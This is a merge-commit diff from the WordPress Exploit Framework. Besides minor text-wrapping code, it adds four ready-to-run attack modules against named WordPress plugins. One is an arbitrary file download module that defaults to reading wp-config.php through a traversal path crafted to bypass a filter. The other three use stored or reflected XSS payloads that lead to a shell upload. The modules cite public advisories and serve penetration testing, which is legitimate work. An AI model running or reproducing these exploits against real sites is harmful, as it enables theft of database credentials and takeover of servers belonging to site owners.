Merge branch 'development'

rastating · Apr 1, 2017 · 384bda5 · 384bda5
2 parents 4df9841 + 44d7dbf
commit 384bda5
Show file tree

Hide file tree

Showing 7 changed files with 167 additions and 3 deletions.
diff --git a/VERSION b/VERSION
@@ -1 +1 @@
-1.5.1
+1.5.2
diff --git a/lib/cli/module_info.rb b/lib/cli/module_info.rb
@@ -16,7 +16,7 @@ def print_description
         if context.module.module_description_preformatted
           print_std(indent_without_wrap(context.module.module_desc))
         else
-          print_std(wrap_text(context.module.module_desc).strip)
+          print_std(remove_new_lines_and_wrap_text(context.module.module_desc).strip)
         end
       end
     end

diff --git a/lib/cli/output.rb b/lib/cli/output.rb
@@ -7,12 +7,17 @@ def indent_cursor(level = 1)
       @indent_level -= level
     end
 
-    def wrap_text(s, padding = 0, width = 78)
+    def remove_new_lines_and_wrap_text(s, padding = 0, width = 78)
       s.tr("\n", '')
        .gsub(/(.{1,#{width}})(\s+|\Z)/, "\\1\n#{@indent * @indent_level}#{' ' * padding}").chomp
        .gsub(/\s+$/, '')
     end
 
+    def wrap_text(s, padding = 0, width = 78)
+      s.gsub(/(.{1,#{width}})(\s+|\Z)/, "\\1\n#{@indent * @indent_level}#{' ' * padding}").chomp
+       .gsub(/\s+$/, '')
+    end
+
     def indent_without_wrap(s)
       s.gsub(/\n/, "\n#{@indent * @indent_level}")
     end

diff --git a/modules/auxiliary/membership_simplified_arbitrary_file_download.rb b/modules/auxiliary/membership_simplified_arbitrary_file_download.rb
@@ -0,0 +1,47 @@
+class Wpxf::Auxiliary::MembershipSimplifiedArbitraryFileDownload < Wpxf::Module
+  include Wpxf::WordPress::FileDownload
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Membership Simplified <= 1.58 Arbitrary File Download',
+      desc: %(
+        This module exploits a vulnerability which allows you to download any arbitrary file accessible
+        by the user the web server is running as. Relative paths must use "..././" as opposed to "../",
+        in order to bypass mitigation within the plugin.
+      ),
+      author: [
+        'Larry W. Cashdollar',             # Disclosure
+        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+      ],
+      references: [
+        ['CVE', '2017-1002008'],
+        ['WPVDB', '8777'],
+        ['URL', 'http://www.vapidlabs.com/advisory.php?v=187']
+      ],
+      date: 'Mar 13 2017'
+    )
+  end
+
+  def check
+    changelog = normalize_uri(wordpress_url_plugins, 'membership-simplified-for-oap-members-only', 'readme.txt')
+    check_version_from_custom_file(changelog, /\=\s+Beta\s+(\d+\.\d+(\.\d+)*)\s+\=/, '1.59')
+  end
+
+  def default_remote_file_path
+    '..././..././..././wp-config.php'
+  end
+
+  def working_directory
+    'wp-content/plugins/membership-simplified-for-oap-members-only'
+  end
+
+  def downloader_url
+    normalize_uri(wordpress_url_plugins, 'membership-simplified-for-oap-members-only', 'download.php')
+  end
+
+  def download_request_params
+    { 'download_file' => remote_file }
+  end
+end
diff --git a/modules/exploits/gwolle_guestbook_stored_xss_shell_upload.rb b/modules/exploits/gwolle_guestbook_stored_xss_shell_upload.rb
@@ -0,0 +1,45 @@
+class Wpxf::Exploit::GwolleGuestbookStoredXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::StoredXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Gwolle Guestbook <= 2.1.0 Stored XSS Shell Upload',
+      author: [
+        'Radjnies Bhansingh',             # Disclosure
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8785'],
+        ['URL', 'https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_gwolle_guestbook_wordpress_plugin.html']
+      ],
+      date: 'Mar 01 2017'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('gwolle-gb', '2.1.1')
+  end
+
+  def vulnerable_page
+    'the post review page'
+  end
+
+  def store_script
+    execute_post_request(
+      url: full_uri,
+      body: {
+        'gwolle_gb_function' => 'add_entry',
+        'gwolle_gb_book_id' => '1',
+        'gwolle_gb_author_name' => Utility::Text.rand_alpha(5),
+        'gwolle_gb_author_origin' => "#{Utility::Text.rand_alpha(5)}\" onmouseover=#{xss_ascii_encoded_include_script} a=\"",
+        'gwolle_gb_author_email' => Utility::Text.rand_email,
+        'gwolle_gb_author_website' => '',
+        'gwolle_gb_subject' => Utility::Text.rand_alpha(5),
+        'gwolle_gb_content' => Utility::Text.rand_alpha(10),
+        'gwolle_gb_submit' => 'Submit'
+      }
+    )
+  end
+end
diff --git a/modules/exploits/tribulant_slideshow_gallery_reflected_xss_shell_upload.rb b/modules/exploits/tribulant_slideshow_gallery_reflected_xss_shell_upload.rb
@@ -0,0 +1,32 @@
+class Wpxf::Exploit::TribulantSlideshowGalleryReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Tribulant Slideshow Gallery <= 1.6.4 Reflected XSS Shell Upload',
+      author: [
+        'Spyros Gasteratos',              # Discovery
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8786'],
+        ['URL', 'https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_tribulant_slideshow_galleries_wordpress_plugin.html']
+      ],
+      date: 'Mar 01 2017'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('slideshow-gallery', '1.6.5')
+  end
+
+  def vulnerable_url
+    normalize_uri(wordpress_url_admin, 'admin.php')
+  end
+
+  def url_with_xss
+    "#{vulnerable_url}?page=slideshow-galleries&method=savegtlcq%5C%22%3E%3Cscript%3E#{xss_url_and_ascii_encoded_include_script}%3C%2Fscript%3E"
+  end
+end
diff --git a/modules/exploits/wp_filebase_download_manager_reflected_xss_shell_upload.rb b/modules/exploits/wp_filebase_download_manager_reflected_xss_shell_upload.rb
@@ -0,0 +1,35 @@
+class Wpxf::Exploit::WpFilebaseDownloadManagerReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::StagedReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'WP-Filebase Download Manager <= 3.4.4 Reflected XSS Shell Upload',
+      author: [
+        'Yorick Koster',                  # Disclosure
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8783'],
+        ['URL', 'https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_wp_filebase_download_manager_wordpress_plugin.html']
+      ],
+      date: 'Mar 01 2017'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('wp-filebase', '3.4.5')
+  end
+
+  def vulnerable_url
+    normalize_uri(wordpress_url_admin, 'admin.php?page=wpfilebase_files')
+  end
+
+  def initial_script
+    create_basic_post_script(
+      vulnerable_url,
+      'page' => "\\\"><script>#{xss_ascii_encoded_include_script}<\\/script>"
+    )
+  end
+end